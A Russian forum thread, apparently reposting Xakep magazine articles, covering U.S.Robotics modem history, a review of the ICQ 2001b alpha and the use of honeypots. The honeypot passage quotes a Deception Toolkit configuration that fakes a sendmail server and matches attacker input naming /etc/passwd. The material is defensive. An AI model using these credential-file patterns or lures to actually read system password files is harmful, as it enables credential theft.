В 1976 году молодые выпускники чикагского университета Пол Коллард, Том Россен, Стэн Меткалф и Стефен Мука во главе с Кейси Коуэллом создали свою фирму и назвали ее U.S.Robotics. Название они взяли из повести известного писателя-фантаста Айзека Азимова "Я Робот". В повести Азимова рассказывается о гигантской компании-монополисте U.S.Robots по производству говорящих роботов. Наверное, мечтая создать такую же крупную компанию, молодые бизнесмены решили назвать свою маленькую фирму U.S.Robotics, хотя она и не имела никакого отношения к роботам. Стартовый капитал составлял около $200 в виде компьютерных комплектующих, необходимых для начала работы, а офис находился в помещении, принадлежащем отцу Тома Россена, возле военно-морских складов Чикаго. Кэйси Коуэлл стал главой компании и оставался ею почти 20 лет.

Первой идеей было создание терминала для ЭВМ, но потом все же решили разрабатывать акустические устройства, преобразующее цифровые данные, поступающие от компьютера, в звуковой сигнал, чтобы его можно было передать на другой удаленный компьютер по обычной телефонной сети. Такое устройство называется Acoustic Coupler - прообраз современного модема. Его не надо подключать к телефонной линии, а достаточно приложить к телефонной трубке, чтобы звук передавался на удаленную сторону. В 1978 году фирма предлагала свои первые Acoustic Couplers, работающие на скорости 300 бит/сек. Поначалу продажи шли очень вяло, и двое из основателей (Том Россен и Стэн Меткалф) покинули U.S.Robotics в первый же год, не веря в успех предприятия. Но несколько знаменательных событий, произошедших в течение последующих двух лет, кардинально изменили ситуацию.

Так, в 1978 году Деннис Хайес основал компанию Hayes Microcomputer Products и уже в следующем году выпустил на рынок Micromodem II на 110/300 бит/сек для персональных компьютеров Apple II. Еще более важное событие произошло в 1980-м, когда Hayes Microcomputer выпустила Smartmodem 300, так называемый "умный модем", который умеет воспринимать AT-команды и позволять пользователю в интерактивном режиме управлять модемом. Набор AT-команд фирмы Hayes быстро стал фактическим стандартом, а модемы, поддерживающие его, теперь называются Hayes-совместимые. В 1979 г. Международный Консультативный Комитет по Телеграфии и Телефонии (CCITT) принимает первую модемную рекомендацию V.21, определяющую стандартный протокол модуляции на скорости 300 бит/сек., а в 1980-м - рекомендацию V.22 на 1200 бит/сек. Эти события во многом предопределили развитие модемной индустрии, а стандартизация протоколов и единой системы команд позволила производителям разрабатывать максимально совместимые друг с другом изделия.

Все это сразу отразилось на делах фирмы U.S.Robotics. Рост популярности персональных компьютеров и увеличение объемов их продаж привели к такому же спросу на устройства связи, и это не могло не сказаться на улучшении финансового положения U.S.Robotics. В 1984 году U.S.Robotics уже перебирается в просторную штаб-квартиру в Скоки (пригород Чикаго).

Courier и HST

В 1984 году в Женеве на заседании Комитета CCITT была утверждена очередная рекомендация на передачу данных по телефонным сетям общего пользования V.22bis, описывающая дуплексную передачу данных со скоростью до 2400 бит/сек. В том же году на международной выставке COMDEX'84 многие компании представили свои разработки модемов V.22bis, а в 1985 году U.S.Robotics объявляет о выпуске своего нового модема Courier 2400.

Модем был выполнен в большом черном корпусе с многочисленными красными индикаторами на передней панели и выглядел очень солидно. Стоила эта штука безумно дорого - около $1000, а в основу модема легли микроконтроллер Intel 8031 и процессор обработки сигналов TMS32020 фирмы Texas Instruments. Спустя два года фактически этот же модем, но с другой микропрограммой выпускается под названием Courier HST 9600. В дальнейшем все новые разработки U.S.Robotics велись преимущественно на процессорах Intel и Texas Instruments.

Протокол HST (High Speed Technology), несмотря на свою простоту, позволил значительно поднять скорость, не изменяя при этом аппаратной базы модема. По сути HST это полудуплексный протокол, представляющий собой урезанную версию V.32 и не позволяющий передавать данные в обоих направлениях одновременно. Поэтому ему требуется значительно меньше вычислительных ресурсов, чем в случае с дуплексным протоколом V.32. Помехоустойчивость HST значительно выше, т.к. отсутствует сложная процедура эхо-компенсации. Если другим фирмам для производства модема 9600 с протоколом V.32 приходилось разрабатывать другую, более мощную аппаратуру, то U.S.Robotics убил сразу двух зайцев: с помощью фирменного протокола HST удалось создать одновременно и высокоскоростной, и помехоустойчивый модем, причем без существенных капиталовложений в производство. Новая цена на Courier HST 9600 в 1987 году составляла $995, а внешний вид по сравнению с Courier 2400 не изменился
В 1988 году компания U.S.Robotics вынуждена переработать архитектуру своего модема Courier, так как новый дуплексный протокол V.32, принятый Международным Комитетом CCITT, требует значительно больше вычислительных ресурсов, нежели предыдущий V.22bis. Сердцем модема стал 188-ой микроконтроллер от Intel, плюс более мощный сигнальный процессор TMS320C25. Модем назвали Courier Dual Standard (поддерживающий два стандарта: V.32 и HST), а начальная цена была точно не для бедных студентов - $1500. Отметим, что с самого начала модемы Courier позиционировались на рынке как устройства бизнес-класса для корпоративных пользователей и организаций, а потому и стоили весьма недешево (по сравнению с модемами других производителей).

В 1991 году дизайн Courier'а преображается - корпус становится компактнее, световые индикаторы - прямоугольными, появился переключатель Voice/Data на передней панели, а регулятор громкости встроенного динамика стал движковым. С появлением в 1994 году нового протокола V.34 Courier DS переименовали в Courier V.Everything, что означало поддержку всех стандартных рекомендаций ITU-T (бывшая CCITT ) серии V.* Вот уже более десяти лет меняется только начинка модема и иногда название, а внешний вид остается прежним, поэтому Courier всегда легко узнаваем среди тысяч других модемов.

Сегодня компания U.S.Robotics выпускает обновленную версию модема 3COM Courier V.Everything с технологией V. Everywhere. Теоретически эта технология обеспечивает приспособление модема к стандартам любой страны - достаточно дать одну команду, и вся микропрограмма адаптируется к работе в новых условиях. На практике все иначе. Для российского пользователя модем лучше не стал, а отсутствие к нему модернизированных прошивок (таких как AVC-56), сокращает возможности модема. Но это уже отдельная тема для другой статьи.

Sportster

Возрастающий спрос на модемы среди обычных пользователей заставляет компанию задуматься о более дешевом варианте модема для домашнего и индивидуального использования. И было найдено довольно оригинальное решение: сохранить аппаратную архитектуру Courier'a и значительно урезать возможности микропрограммы управления. Поместив все это в маленький белый корпус (в противоположность большому и черному у Courier), фирма выпустила на рынок Sportster V.32. Это решение позволило, с одной стороны, избежать крупных затрат на разработку новой аппаратуры и программного обеспечения под нее, с другой стороны, быстро удовлетворить пользовательский спрос на качественный модем, сравнимый по надежности с линией продуктов Courier. Такая рационализация имела большой успех у российских пользователей, которые разработали несложные приемы, позволяющие переделать Sportster обратно в Courier (аппаратура-то одинаковая) и воспользоваться функциональными возможностями последнего за значительно меньшую цену.

Правда, не всегда новые разработки оказывались столь успешными. Так в 1995 году было принято решение разработать новую аппаратуру для популярной линии дешевых модемов Sportster. Так как до сих пор они делались на базе Courier'a, то при постоянном снижении цен на модемы производить их, вероятно, становилось все менее выгодно. Модем значительно упростили, оставив только один процессор, а большую часть мелкой логики собрали в один заказной чип. Однако новая микропрограмма управления поначалу имела так много ошибок, что U.S.Robotics пришлось отзывать несколько крупных партий проданных модемов.

Winmodem

После выхода в 1995 году новой графической оболочки Windows 95 и ее последующего широкого распространения U.S.Robotics выпускает новый продукт для домашнего пользователя под названием Sportster Winmodem. Это более дешевый вариант внутреннего спортстера, который содержит только сигнальный процессор и аналоговый интерфейс с телефонной линией; все остальные функции (управление модемом, коррекция ошибок и сжатие данных) возлагаются на драйвер, работающий под управлением Windows. Благодаря своей дешевизне, такой модем быстро нашел признание пользователей Интернет, хотя и обладал рядом недостатков. Создавая дополнительную нагрузку на процессор, да еще и под управлением постоянно зависающей Win95, Winmodem был очень ненадежным устройством.

Сейчас производительность центрального процессора выросла настолько, что уже всю сигнальную обработку, которая раньше выполнялась в DSP модема, можно перенести на центральный процессор ПК. При этом загрузка не превышает 10% от PentiumIII-700, а ОС Windows-2000 уже обладает достаточной надежностью, чтобы софт-модем работал вполне сносно.

Формула успеха

Основой успеха компании стали собственные разработки в области передачи данных и реализации протоколов. Если другие модемные фирмы в целях удешевления своих устройств использовали чипсеты (наборы микросхем) от крупных производителей (к примеру, AT&T или Rockwell), то фирма U.S.Robotics всегда применяла в своих изделиях универсальные процессоры и самостоятельно разрабатывала уникальные алгоритмы управления для них. Немалую роль сыграло и то, что при проектировании аппаратуры модема разработчики всегда делали запас на будущее, поэтому при появлении нового протокола или повышении скорости передачи данных не нужно было создавать новое устройство - достаточно лишь доработать микропрограмму управления старого. Пользователь, купивший Courier 2400, мог запросто повысить скорость своего модема до 9600, заплатив небольшую сумму за модернизацию. На протяжении всей своей истории U.S.Robotics постоянно пользовалась этим преимуществом, выпуская новые разработки раньше своих конкурентов на несколько месяцев, а также предлагая программный апгрейд устаревших моделей на более современные технологии.

В России идея программной модернизации изделий U.S.Robotics приобрела совершенно иной смысл. Благодаря тому, что в модемах USR используются универсальные микропроцессоры Intel и TI, существует возможность самостоятельно, чисто программно улучшать пользовательские свойства модемов и вносить туда такие изменения, которые вряд ли когда появятся в оригинальном исполнении от фирмы-производителя. С последними достижениями в деле адаптации модемов Courier и Sportster к российским условиям можно ознакомиться и совершенно бесплатно получить на сайте www.usrmodem.ru. Модемы Courier приобрели голосовые функции и АОН, а также массу настроек и регулировок. Некоторые модели обычных факс-модемов U.S.Robotics также приобретают вторую жизнь - нормальное распознавание сигналов "занято", плавная регулировка громкости встроенного динамика, голосовые функции и ряд других
В нашей стране история модемов вообще и U.S.Robotics в частности неразрывно связана с историей развития сети FIDO. Для тех, кто не знаком с FIDO, кратко поясню, что это такое. Основным отличием FIDO от других глобальных сетей является то, что она с самого начала задумывалась как "сеть друзей" - людей, объединенных общими интересами, а не как средство извлечения выгоды или полигон для военных (как было с ApraNet/Internet). Возникнув в 1984 году как сеть BBS (электронных досок объявлений) в США, она превратилась в сообщество, объединяющее людей во всем мире. Хотя многие благие намерения создателей оказались невыполнимы, сеть росла и общая ее идея сохранилась.

В России FIDO появилась в 1990 году благодаря многочисленным энтузиастам и фанатам персональных компьютеров. Интернета у нас тогда еще не было, а потребность продвинутых программистов и пользователей общаться друг с другом постоянно возрастала. Для решения этой проблемы и была организована сеть из разрозненных BBS-ок, которая стала быстро расширяться и пополняться новым участниками. Распространение электронной почты в FIDO тогда шло только по телефонным линиям, а для этого, конечно, необходим модем, и желательно надежный, способный работать на междугородних непробиваемых каналах типа Москва - Новосибирск. В начале 90-х для этого использовались преимущественно модемы 1200 V.22 малоизвестных сейчас фирм, без протоколов коррекции ошибок с примочками к fossil'у, эмулирующими MNP2 и MNP5. Вскоре появились и прочно обосновались на нашем рынке модемы ZyXEL 1496 на 19200бит/сек. USR Courier может и обладал некоторыми преимуществами перед ZyXEL (хотя бы наличие HST), но был слишком дорог и встречался довольно редко. Переломным в этой ситуации стал 1993 год, когда начался массовый завоз в нашу страну дешевых и качественных USR Sportster 14400. Хотя там отсутствовал HST и максимальная скорость была ниже, чем у ZyXEL, но на протоколе V.32 этот модем работал вполне сносно, и Sportster заслуженно стал народным модемом - самым дешевым из брендов. Через некоторое время появились адаптированные российские прошивки к ним и возможность делать upgrade, различными способами превращая Sportster в Courier, что еще больше способствовало их популярности.

Откровенно говоря, реализация протокола V.32 в модемах U.S.Robotics являлась далеко не самой лучшей из существующих разработок, особенно в моделях Sportster. К примеру, "фирменной" особенностью этих модемов было неумение повышать битовую скорость (fallforward), поэтому, если модем снижал скорость во время сеанса, например, из-за помех в линии, то повысить он ее уже не мог. Особенно ошибки были заметны на линиях плохого качества. ZyXEL в этом плане работал значительно лучше, чем USR Sportster. Впоследствии некоторые ошибки исправлялись нашими независимыми специалистами в рамках работ по локализации изделий USR.












--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 14 2006, 17:45
Сообщение #87


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



Аленький цветочек

Ну, положим, он не совсем аленький, точнее - совсем не аленький. Да и работа с последней его версией отнюдь не напоминала сказку. Однако обо всем поподробнее, обстоятельно и прямо сейчас.

Для тех, кто не понял, о чем это я, и, удивленно почесывая бронированный лоб, восклицает: «Чо это, ][ сказки печатать начал?», поясню, что в начале октября AOL представил изумленной общественности новую версию своего клиента, которого все занудные новостные агентства почему-то упорно называют ICQ, однако мы-то с тобой знаем, что на самом деле это зовется «аськой» и никак более ;-). Потому и цветочек. Ну, а учитывая то, что последний раз ][ описывал аську во все дыры более года назад, эту статью вполне позволительно назвать возвращением к теме.

Итак, маэстро - музыку! На арене - ICQ 2001b alpha (build 3619). Я подозреваю, что большинство читающих сии строки активно юзают различные беты ICQ 2000, ну а мастодонты так вообще сидят в 98-й аське, и ничего больше им от жизни не нужно. Всю же прогрессивную часть нашей community с выходом новой версии волнует, в основном, один вопрос: что это за зверь, лучше он предыдущего или нет, и если лучше, то стоит ли ставить?

Что тут дают?

Первое, что приходит в голову, - это описать все новые фичи аси. Важно другое - насколько новые опции полезны для нас, чтобы мы тут же бросились забивать трафик даунлоадерами или же, наоборот, плюнули на все. Разумеется, на том же icq.com все нововведения расписаны в самых восторженных тонах, как самые необходимые и фантастически полезные. Но чего-то я им не верю: было бы странно, если бы они писали обратное smile.gif. Посему давай разберемся, что тут к чему и что оно нам дает. После представления каждой новой функции я попытаюсь объективно оценить ее пользу smile.gif


Не все фьючерсы одинаково полезны

Во-первых, процедура установки новой аськи превратилась для «нашего человека» в нетривиальный процесс. Все дело в том, что с сайта AOL'а сливается лишь утилита-инсталлятор в 223 кб весом, которая при запуске вежливо предлагает тебе выбрать тип установки: «стандартный» и «по выбору» (кстати, когда, наконец, этот пункт перестанут тупо называть «Advanced"? Неужели нужно быть гением, чтобы всего лишь ткнуть крысой в те приблуды, которые хочешь установить?). После этого прога стучится на ftp-шник Мирабилиса и сама начинает скачивать выбранные фьючерсы для установки.

Увидев это и вспомнив, что предыдущая аська весила пять с лишним мегов, я выронил из рук бутылку с минералкой (да-да, минералкой!) и бросился было писать редактору письмо в духе «а не пошел бы ты со своим заданием написать про аську, ибо с моим коннектом за один раз такое фиг сольешь». Однако, к моему счастью, новый дистрибутив похудел до трех мегабайт, дисконнектов не было, и аська резво засетапилась, без вопросов встав поверх старой версии. В итоге, зная наши линии связи, могу посоветовать тебе при установке выбирать только самые необходимые компоненты, а остальные докачивать потом, по мере надобности, благо они теперь реализованы в виде удобных плагинов: если ты запускаешь отсутствующий сервис, аська предложит тебе скачать его и запустит либо сразу же, либо потом, по требованию. Напротив таких, неустановленных сервисов, стоит надпись Activate.

Итак, вопрос - удобно ли это? С одной стороны, в свете все более разбухающих (в плане размера) программных продуктов, похудение тети аси (тетя стала более стройной ;-) выглядит весьма и весьма выгодно (даже полная установка всех функций весит меньше предыдущей версии проги), плюс к тому - качаем не все, в том числе то, что нам не нужно, а по собственному выбору (то, что скачать нужно точно, это инсталлятор и непосредственно клиент, они занимают львиную долю размера «полного» дистрибутива). С другой стороны, даунлоадить три мегабайта без возможности докачки - стремненько, но буржуи на своих толстых каналах не знают, что такое дисконнект, а посему, если решишь ставить, то столкнуться тебе с этим придется sad.gif.

Да, кстати, еще одна фишка: при установке аська теперь, как заявляют разработчики, сама определяет настройки твоего файрвола (если он есть ;-), что исключает конфликты. Не знаю, не знаю, но мой Zone Alarm Pro асю на бескрайние просторы Сети выпустил, однако новая вкусная фича - передача файлов (о ней ниже) - сразу не пошла, и с брандмауэром пришлось малость повозиться (радикалы в таких случаях отрубают его на фиг smile.gif. Но это был лишь начальный этап. И вот программа установлена и готова к тому, чтобы ее помучили. Запускаем!


Морда лица

О таких мелочах, как упрощенный для юзанья дизайн и положение настроек, говорить не буду - все это банально, очевидно и набило оскомину (как микрософтовское «тесная интеграция с вебом» smile.gif, ибо есть неотъемлемая часть новой версии любой программы как стремление последней к совершенству пользовательского интерфейса (во как!).

А что же внутри? Продолжаем шагать по новым функциям, самой заметной из которых является возможность передачи файлов между юзерами. Выглядит это так: ты либо можешь отправить файло отдельному челу, выбрав соответствующий пункт меню в диалог-боксе, либо дать доступ к своему архиву сразу всем. Для этого создается специальная расшаренная папка, которая, собственно, так и зовется: ICQ Shared Files, которая видна всем и в которую ты скидываешь самые непристойные картинки на всеобщее обозрение. Припоминаешь DCC-клиент в IRC? Так вот, тетька аська решила не отставать от тетьки ирки :-)). О, я сплю и вижу, когда в разговоре на вопрос «откуда ты взял дистрибутив новой винды» последует ответ: «вчера по аське слил». Варезники в нирване! А если серьезно, то очень интересно посмотреть, как на это отреагируют противники Напстера и ему подобных. Разумеется, полезность этой фичи не вызывает сомнений, особенно если твой собеседник - ярый ненавистник IRC (там есть ДЦЦ). Но напомню, что у меня файло стало передаваться стабильно лишь после разговора по душам с файрволом. Да, кстати, в новой ICQ остались баннеры как дурное наследие предыдущих версий. Однако об этом я молчу: от них и в старых аськах нормальные люди легко избавлялись, избавятся и в

этой. Между прочим, в моей предыдущей ICQ2000b реклама была заботливо вырезана (способом, упомянутым мною в ][#9, в статье «Джентльменский набор»), а проинсталлив новую версию, я с изумлением увидел, что в ней баннеры также отсутствуют, и лезть по второму разу в eXescope не пришлось smile.gif

Следующая вкусная фича аси - новые возможности в работе с контакт-листом. Причем заботливая тетя не просто сама сохраняет его каждые пять сеансов, но и позволяет утянуть свой (или не свой wink.gif лист контактов с сервера ICQ. Что это значит? А то, что теперь, решив заиметь асю на нескольких машинах, тебе не придется бегать к ним с контакт-листом на дискетке - достаточно загрузить его с пресловутого сервака. Удобно! В довершение этого ты можешь проделать в новой аське следующие финты: получить от любого перца в твоем контакт-листе часть его контактов (по обоюдному согласию smile.gif, а также заранее авторизовать у себя чела, которого ты добавляешь в список в случае включенной у тебя и у него опции «authorization required». То есть, если ты кого-то добавил и «ждешь авторизации», то челу достаточно авторизовать тебя у себя, так как у тебя он уже авторизован тобой заранее при добавлении smile.gif) Ты не запутался? Хорошо, скажу проще: наконец-то появилась возможность избежать дурацких запросов типа «авторизуй меня!!» - «а теперь ты меня!!!». Надо сказать, подобные возможности давно были желаемы требовательными юзерами, а потому восприняты ими на ура. «Ну а если кто-нибудь в очередной раз взломает сервак АОЛ'а и доберется до контакт-листов?» - спросишь ты. Да кому, на фиг, нужны твои жалкие контактики, отвечу я smile.gif.

Идем дальше и кидаем свой взгляд на окошко, в котором ты перекидываешься мессагами. Тут изменения особенно заметны. Во-первых, для тех, кого не устраивают сочетания скобочек, восьмерочек и двоеточий, появилась новая фича: теперь ты можешь вставить в мессагу любое смайло по выбору, и, как видишь на скрине, выбор их достаточен, все они довольно убоги, но забавны smile.gif. Абсолютно так же, пиктограммами, можно выставить и свое настроение (картинки еще более убоги). Не знаю, может, кого-то эта фича и пропрет, но для меня так ничего лучше восьмерки с закрывающей скобкой в качестве смайлика еще не придумали 8).

Кроме этого, теперь в аське есть такая немаловажная для тех, кто боится прослыть безграмотным, функция, как проверка орфографии. Впрочем, можешь закатать губу обратно, так как опционально она настроена на английский язык, стало быть, любое русское слово для нее - незнакомое (помимо дефолтового английского там присутствует еще несколько словарей, но русского, увы, среди них нету). Может, потом выйдет какой-нибудь language pack, однако на момент написания статьи его замечено не было. Посмотри, какую альтернативу предложил этот горе-корректор слову Xakep. Скажи мне, причем

тут косметика?

Ну и, наконец, если ты вконец не дружишь с английским, то можешь использовать небезызвестную софтину LingoWare для перевода аськиного фейса на родной язык. Впрочем, этого я тебе делать категорически не рекомендую, ибо переводит он весьма посредственно. Еще из новых опций упомяну возможность послать одну и ту же мессагу юзеру сразу по аське, мылу и SMS, и все это -

не вылезая из диалогового окна, просто ткнув соответствующую галочку! Во как, теперь ты можешь заспамить бедного чела в три раза сильнее smile.gif. Все это, конечно, хорошо, но не срывайся лететь качать новую асю, ибо в конце я (а точнее, разработчики клиента) приготовили тебе большущую ложку дегтя.

Баг или фича?

Все дело в том, что по старой доброй традиции Мирабилис выкладывает в сеть альфа и бета версии своей проги, подразумевая, что юзать ты их будешь на свой страх и риск, и за возможные сбои он не отвечает. Вот и сейчас нам досталась самая первая альфа версия новой аськи, и багов в ней - навалом, причем с некоторыми нельзя мириться. В силу особенностей печатного цикла журнала я вполне могу предположить, что к тому времени, как ты будешь держать этот номер ][ в руках, ICQ inc. разразится новым бета-релизом, и большинство описанных багов будут уже неактуальны, однако что мы имели - то мы и рассказываем. А имели мы (во всех смыслах smile.gif ICQ 2001b alpha build 3619.

И вот какие ужасы предстали перед нами.

Во-первых и «в-главных», новая ася время от времени имеет некоторые проблемы с мессагами на русском языке. Выглядит это так: ты бурно общаешься с какой-нибудь девчонкой, хочешь выразить все свои чувства к ней, набиваешь многокилобайтное послание о том, как она прекрасна, как ты ее любишь и все такое, и жмешь кнопку «send». Сердце твое подскакивает до заоблачных высот и замирает в ожидании: что же она ответит?... А она отвечает тебе: «Чего ты мне за байду написал, я вижу одни знаки вопроса???». Альфа-версия ICQ, господа, прошу любить и жаловать! Ошибка в обработке принятых сообщений в кириллице собственной персоной. Но это еще не все. Баг номер два - в том, что ICQ 2001b alpha некорректно обрабатывает ввод мессаги. Если ты набил километр текста и курсор дошел до края окна, то попробуй нажми пробел: текст не перескочит на нижнюю строчку, как ты того ожидаешь. Глюк-с. Кроме того, в процессе активных испытаний нами были замечены проблемы с обработкой запроса на авторизацию и добавления юзера в контакт-лист (он все время сваливался в awaiting authorization или пропадал из листа вообще), также ася имеет обыкновение менять шрифт по ходу общения (в отдельных мессагах). Ну и, наконец, чисто специфическая бага: заинсталлив аську в своем винтукее, как и положено, под рутом, я столкнулся с определенными проблемами при запуске ее из-под менее привилегированного пользователя.

Это только самые очевидные баги. В первой альфа-версии их еще много. Но, повторюсь, сейчас, когда ты все это читаешь, они уже могут быть исправлены. А могут и не быть smile.gif.

(2b) || !(2b)

To be or not to be - качать или не качать, ставить или не ставить. Ты еще не ответил себе на этот вопрос? Что, твердо решил не изменять своей двухтысячной? Или, наоборот, уже качаешь инсталлятор? Давай прикинем. Разумеется, у новой аськи есть плюсы (было бы смешно, если бы это было не так). Какие из них для тебя реально полезны - решай сам, я свою точку зрения высказал. Мое твердое мнение: пока не будет нового надежного релиза 2001-й аськи, обновлять ее не стоит (если только ты не экстремал и не любишь все самое свежее, пусть и глючное). Новые возможности удобны, однако не революционны, и можно вполне прожить без них. Однако текущие баги, в особенности - с обработкой мессаг в кириллице, здорово портят жизнь. Как только их исправят (если уже не исправили), можешь смело пробовать новую версию ICQ на вкус. Ну а я, почесав затылок, плюнул и оставил затестированную во все дырки тетю асю, простив ей ее кривоватость: мне с глючным софтом сражаться не впервой...





--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 14 2006, 23:05
Сообщение #88


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



"Горшочек меда" как способ обмана кульных хацкеров



Прочтя подшивку журнала ][, ты начал говорить непонятными словами: "Флудить, сканить, DoSить, нючить, дро..." Ну и пошлый же ты! Я имел ввиду "дропить" пакеты соседей по домашней локалке smile.gif. Но однажды, вкручивая очередной нимфе, какой ты крутой, и демонстрируя, как запросто ты серфишь по Сети, "случайно" заходя на порносайты и подводя свою подругу к очевидному для тебя выводу, твой комп падает в голубой экран. Значит, кто-то добрался и до тебя. Перегрузив комп, ты с удивлением обнаруживаешь, что твоя коллекция потрясающих картинок, которую ты полгода собирал с разных платников, безвозвратно потеряна. Ты вне себя от ярости и желаешь "жестоко отомстить". Но для этого тебе надо попытаться отследить своего визави. Как это сделать?

Можно поставить какой-нибудь firewall или систему обнаружения атак (например, обе этих системы объединены в BlackICE Defender или описываемом ниже RealSecure Server Sensor). Но... есть одна тонкость. Если твой противник умен, а недооценивать его я бы не стал, то он заспуфит свой адрес (как это делается, читай в этом же номере Х). Особенно, если он флудит или как-то по-иному DoS-ит тебя. Итак, тебе надо, с одной стороны, привлечь противника какой-нибудь целью, чтобы он потратил время на проникновение, а с другой - эта цель не должна быть реальной, т.е. не стоит использовать в качестве мишени свой компьютер или компьютер своего соседа по локалке. Какой отсюда следует вывод? Нужна приманка, о которой мы сейчас и поговорим.

Это ты о чем?

Смысл приманки, она же decoy, она же deception system (обманная система), она же honeypot (горшочек меда), один - завлечь противника, чтобы он стал тратить свое время и ресурсы на хак несуществующих или не имеющих реальной ценности ресурсов. Тем самым ты получаешь время на отслеживание визави, а при необходимости и на сбор следов его противоправной деятельности. Хотя вряд ли ты захочешь связываться с правоохранительными органами. Толку никакого, а мороки выше крыши. Кроме того, обманные системы могут сбить с толку нападающих, привыкших к широко известным средствам сетевой безопасности (firewall, IDS и т.д.).

Методы

Существует три часто применяемых варианта использования обмана в благих целях:

1. Сокрытие. Ты когда-нибудь использовал firewall в своей сетке? Если да, то тебе наверняка знакомо понятие "трансляция адресов" (network address translation). Если нет, то это когда одни адреса заменяются на другие. Например, адреса машин в твоей локалке меняются на один адрес firewall. Это и есть яркий пример обмана хакеров. Не зная твоего реального адреса, тебя очень трудно атаковать. Но и хакеры используют эту технологию не менее эффективно. Прокси-сервер - это тоже обман, но уже с другой стороны.

2. Камуфляж. Этот механизм используется не так часто, но он тоже скрывает в себе большую мощь. Например, подключаясь к FTP-серверу, твоему взору демонстрируется заголовок:

Connected to ftp.server.ru

220 ftp.server.ru Microsoft FTP Service (Version 4.0),

говорящий о том, что перед тобой мелкософтовский FTP-сервер под NT. А на самом деле на удаленном узле установлен Unix'овый сервак. Ты будешь тратить свои энергию и бабло на то, чтобы найти хоть одну дыру в FTP, удивляясь, "как это на мелкософте и нет дыр", а на самом деле хитрый админ просто сменил заголовок (banner), который появляется при подключении к серверу.

3. Дезинформация. С этим еще проще. Ты помещаешь на компьютер файлы с привлекательными названиями (например, passwd, admin.pwl или users.dat) и ждешь, когда ненасытные и злобные хакеры попытаются их украсть. Но ты не будешь им мешать. Ты-то знаешь, что в этих файлах нет реальных паролей и злоумышленник только потратит время зря, напуская на эти файлы утилиты типа Crack или L0phtCrack.


Что будем делать?

Так как первый класс средств широко известен и применяется в межсетевых экранах, то более подробно я коснусь второго и третьего. Большинство известных систем предназначено для выполнения следующих обманных действий:

1. Эмуляция несуществующих сервисов и портов. Такие системы устанавливаются на компьютер, который и является приманкой для хакеров. Примером такой системы является DTK.

2. Эмуляция несуществующих узлов сети. Такие системы устанавливаются на выделенные узлы, которые и имитируют целые виртуальные сегменты. Примером такой системы является CyberCop Sting.

3. Подмена баннеров. Такие системы зачастую являются расширением систем, эмулирующих несуществующие порты, и генерят баннеры, похожие на настоящие. Примером такой системы является RealSecure Server Sensor.

Попробуй с помощью любого сканера провести сканирование какой-либо машины в сети. В зависимости от решаемых задач, число открытых портов на таких машинах может быть разное, но обычно оно не превышает 30-50 (для серверов) и 5-10 (для рабочих станций). Для хостов Unix число открытых портов несколько больше, но не намного. Если с помощью обманной системы число открытых портов увеличивается в 10 раз, то и число действий, которые должен выполнить хакер, также возрастает как минимум на порядок. Даже использование сканеров не сильно облегчает задачу, т.к. они вводятся в заблуждение так же, как и человек. Создаваемые сканерами безопасности отчеты не смогут помочь злоумышленнику определить, какие из открытых портов являются реальными, а какие нет. Тем самым злоумышленнику придется тратить время и ресурсы на ручную проверку всех обнаруженных портов и присущих им уязвимостей, что позволит своевременно обнаружить такие попытки и противопоставить им эффективные средства защиты, и, возможно, обнаружить злоумышленника (хотя обольщаться этим не стоит).

The Deception Toolkit и другие перлы

DTK является одним из известных обманных средств. Этот комплект (http://all.net) представляет собой набор программ на языке Perl, реализующих описанные выше механизмы обмана кульных хацкеров. По заявлению автора DTK - Фреда Коэна, этот комплект утилит может функционировать под управлением любой сетевой операционной системы, но широкое применение он получил на платформе Unix (хотя теоретически будет работать и под Windows с ActivePerl). Как и другие *nix'овые утилиты, DTK настраивается из командной строки путем изменения соответствующих файлов. Обычно вся настройка ограничивается созданием ответных реакций на действия нападающих. Например, вот так выглядит файл *.response, отвечающий за эмуляцию почтовой программы sendmail 8.1.2/8.1.3:

# State Input NexStat Exit lf/file output/filename

# comment lines start with the pound sign (#)

# we are faking sendmail version 8.1.2/8.1.3

0 START 0 1 1 220 all.net ESMTP Sendmail 8.1.2/8.1.3;

0 ERROR 0 1 1 500 Command unrecognized - please say "Helo"

0 help 0 1 1 214-No help available

# if they say helo, we acknowledge and go to state 2

0 helo 1 1 1 250 all.net, pleased to meet you

0 quit 0 0 1 221 all.net closing connection

# if you don't get anything - just ignore it and wait

0 nil 0 1 0

# we got a Helo request

# it contained something with /etc/passwd in it - let's simulate a big hole

1 ! 4 1 2 /etc/passwd @fake.passwd

# this regular expression matched something in the input line - let's simulate a big hole

1 /cat\spasswd/ 4 1 2 @fake.passwd

1 mail 2 1 1 250 proceed

1 rcpt 1 1 1 500 Must say "HELO" first

1 help 1 1 1 214-No help available

1 quit 1 0 1 221 all.net closing connection

1 nil 1 1 0

1 ERROR 1 0 1 500 Server Configuration Error - all.net closing connection

# even a rcpt - this guy's good!!!

2 rcpt 3 1 1 250 proceed end with a '.'

2 help 2 1 1 214-No help available.

2 quit 2 0 1 221 all.net closing connection

2 nil 2 1 0

2 ERROR 2 0 1 500 Server Configuration Error - all.net closing connection

# getting mail - what do I do?!?!?

3 nil 1 1 1 500 Mailbox full - please start again

3 ERROR 3 0 0 500 Server Configuration Error - all.net closing connection

# I sent them a password file - better notify the authorities

4 NOTICE notify.pl Email fc@all.net Just sent a password file to an attacker - sendmail exploit

4 NIL 0 1 1 214-Unknown configuration error

